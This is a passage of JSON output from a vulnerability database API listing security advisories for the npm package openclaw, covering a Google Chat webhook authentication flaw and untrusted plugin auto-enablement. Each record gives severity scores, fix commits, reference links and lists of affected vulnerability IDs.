(`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/googlechat/src/auth.ts now requires expectedAddOnPrincipal matching for add-on principals and rejects unexpected issuers.\n- extensions/googlechat/src/monitor-webhook.ts passes the configured appPrincipal into auth verification for the shipped webhook path.\n\nOpenClaw thanks @ijxpwastaken for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35622", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.22596", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.22641", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00075", "scoring_system": "epss", "scoring_elements": "0.22656", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35622" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mp66-rf4f-mhh8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35622", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35622" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" }, { "value": "6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:16:25Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-improper-authentication-verification-in-google-chat-webhook" }, { "reference_url": "https://github.com/advisories/GHSA-mp66-rf4f-mhh8", "reference_id": "GHSA-mp66-rf4f-mhh8", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mp66-rf4f-mhh8" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35622", "GHSA-mp66-rf4f-mhh8" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-aja9-wzp2-kbcj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89095?format=api", "vulnerability_id": "VCID-arks-g6hw-abbw", "summary": "OpenClaw: Workspace provider auth choices could auto-enable untrusted provider plugins\n## Summary\n\nWorkspace provider auth choices could auto-enable untrusted provider plugins.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nNon-interactive onboarding could select a provider auth choice shadowed by an untrusted workspace plugin, auto-enabling that plugin during auth setup.\n\n## Technical Details\n\nThe fix prefers trusted provider origins for auth choices and excludes untrusted workspace choices unless they are explicitly enabled.\n\n## Fix\n\nThe issue was fixed in #62368. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `2d97eae53e212ae26f3aebcd6a50ffc6877f770d`\n- PR: #62368\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent for reporting this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43569", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00107", "scoring_system": "epss", "scoring_elements": "0.28508", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.29982", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00116", "scoring_system": "epss", "scoring_elements": "0.30011", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43569" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/2d97eae53e212ae26f3aebcd6a50ffc6877f770d", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/2d97eae53e212ae26f3aebcd6a50ffc6877f770d" }, { "reference_url": "https://github.com/openclaw/openclaw/pull/62368", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/pull/62368" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-939r-rj45-g2rj", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-939r-rj45-g2rj" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43569", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43569" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-untrusted-provider-plugin-auto-enablement-via-workspace-provider-auth", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-06T12:42:35Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-untrusted-provider-plugin-auto-enablement-via-workspace-provider-auth" }, { "reference_url": "https://github.com/advisories/GHSA-939r-rj45-g2rj", "reference_id": "GHSA-939r-rj45-g2rj", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-939r-rj45-g2rj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110121?format=api", "purl": "pkg:npm/openclaw@2026.4.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-k8x3-9pv7-rfax" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-rvcq-rqbq-4khp" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { 